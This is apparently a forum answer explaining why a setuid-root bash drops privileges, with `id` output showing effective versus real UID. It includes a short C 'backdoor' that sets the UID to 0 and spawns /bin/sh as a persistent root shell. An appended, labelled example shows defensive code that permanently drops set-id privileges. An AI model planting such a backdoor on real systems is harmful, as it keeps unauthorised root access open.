Because the suid bit influences only the effective UID, and somewhere in the bash code there is a setuid(getuid()) to drop root rights (if executed by non-root). Try /bin/bash1 (I have this on my slack 8) or another shell; they might give you your expected rootshell.

Look at this:

    bash-2.05# id
    uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),16(halt)
    bash-2.05# chmod +s /usr/bin/id
    bash-2.05# exit
    bash-2.05$ id
    uid=1000(spacewalker) gid=100(users) euid=0(root) egid=1(bin) groups=100(users),16(halt)

If you want to program a little backdoor that gives you a rootshell, you have to set your uid to 0. The kernel will give you uid 0 because your effective UID is 0:

    #include <stdio.h>
    #include <stdlib.h>   /* system() */
    #include <unistd.h>   /* setuid(), getuid() */

    int main(){
        setuid(0);   /* only succeeds when the effective UID is already 0 */
        if(getuid()){
            printf("program not suid root\n");
        } else {
            system("/bin/sh");
        }
        return 0;
    }
I hope this answers your question...
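The privilege drop the post attributes to bash, written out as a set-id program would do it on purpose. This is an added example, not part of the original post and not bash's own code: `running_setid` and `drop_to_real_ids` are hypothetical names, and it assumes Linux/glibc for `setresuid`/`setresgid`.

```c
#define _GNU_SOURCE            /* setresuid(), setresgid() */
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

/* 1 when the effective ids differ from the real ones, i.e. a set-id bit is
 * in effect, as in the post's output: uid=1000 euid=0, gid=100 egid=1. */
int running_setid(uid_t ruid, uid_t euid, gid_t rgid, gid_t egid)
{
    return ruid != euid || rgid != egid;
}

/* Permanently return to the real uid/gid (real, effective and saved ids).
 * Returns 0 on success, -1 if a call fails or the drop can be undone. */
int drop_to_real_ids(void)
{
    uid_t ruid = getuid(), old_euid = geteuid();
    gid_t rgid = getgid(), old_egid = getegid();

    /* Group first: after the uid drop we may lack the right to change gids. */
    if (setresgid(rgid, rgid, rgid) != 0) return -1;
    if (setresuid(ruid, ruid, ruid) != 0) return -1;

    /* Verify the drop is irreversible. Skipped when the real uid is root,
     * because root can always set any id again. */
    if (ruid != 0) {
        if (old_euid != ruid && seteuid(old_euid) == 0) return -1;
        if (old_egid != rgid && setegid(old_egid) == 0) return -1;
    }
    return (geteuid() == ruid && getegid() == rgid) ? 0 : -1;
}

int main(void)
{
    printf("before: uid=%ld euid=%ld set-id=%d\n", (long)getuid(),
           (long)geteuid(),
           running_setid(getuid(), geteuid(), getgid(), getegid()));
    if (drop_to_real_ids() != 0) {
        fprintf(stderr, "privilege drop failed, refusing to continue\n");
        return 1;
    }
    printf("after:  uid=%ld euid=%ld set-id=%d\n", (long)getuid(),
           (long)geteuid(),
           running_setid(getuid(), geteuid(), getgid(), getegid()));
    return 0;
}
```

Supplementary groups are left alone here; as the `id` output in the post shows, a set-id bit does not change them.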